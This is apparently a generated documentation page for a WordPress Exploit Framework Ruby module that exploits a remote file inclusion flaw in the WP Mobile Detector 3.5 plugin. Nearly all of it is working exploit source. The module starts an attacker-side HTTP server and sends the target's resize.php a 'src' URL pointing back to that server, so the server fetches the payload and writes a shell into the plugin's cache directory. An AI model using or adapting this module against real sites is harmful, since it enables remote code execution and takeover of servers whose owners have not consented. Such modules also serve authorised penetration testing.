class Wpxf::Exploit::WpMobileDetectorRfiShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 8 def initialize super update_info( name: 'WP Mobile Detector RFI Shell Upload', desc: 'The WP Mobile Detector plugin, in version 3.5, '\ 'allows for remote file inclusion and remote code execution via '\ 'the resize.php script. This exploit only works when the PHP '\ 'option "allow_url_fopen" is enabled (disabled by default in most cases).', author: [ 'White Fir Design', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['URL', 'https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/'], ['WPVDB', '8505'] ], date: 'May 31 2016' ) register_options([ StringOption.new( name: 'rfi_host', desc: 'The external address of this machine', required: true ), StringOption.new( name: 'rfi_path', desc: 'The path to access via the remote file inclusion request', default: Utility::Text.rand_alpha(8), required: true ) ]) end
Public Instance Methods
before_upload()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 81 def before_upload start_http_server(true) true end
check()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 47 def check check_plugin_version_from_readme('wp-mobile-detector', '3.6', '3.5') end
cleanup()
click to toggle source
Calls superclass method
Wpxf::Module#cleanup
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 86 def cleanup stop_http_server super end
on_http_request(path, params, headers)
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 63 def on_http_request(path, params, headers) payload.encoded end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 71 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('src', rfi_url) builder end
plugin_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 43 def plugin_url normalize_uri(wordpress_url_plugins, 'wp-mobile-detector') end
rfi_host()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 51 def rfi_host normalized_option_value('rfi_host') end
rfi_path()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 55 def rfi_path normalized_option_value('rfi_path') end
rfi_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 59 def rfi_url "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}/#{payload_name}" end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 77 def uploaded_payload_location normalize_uri(plugin_url, 'cache', payload_name) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb, line 67 def uploader_url normalize_uri(plugin_url, 'resize.php') end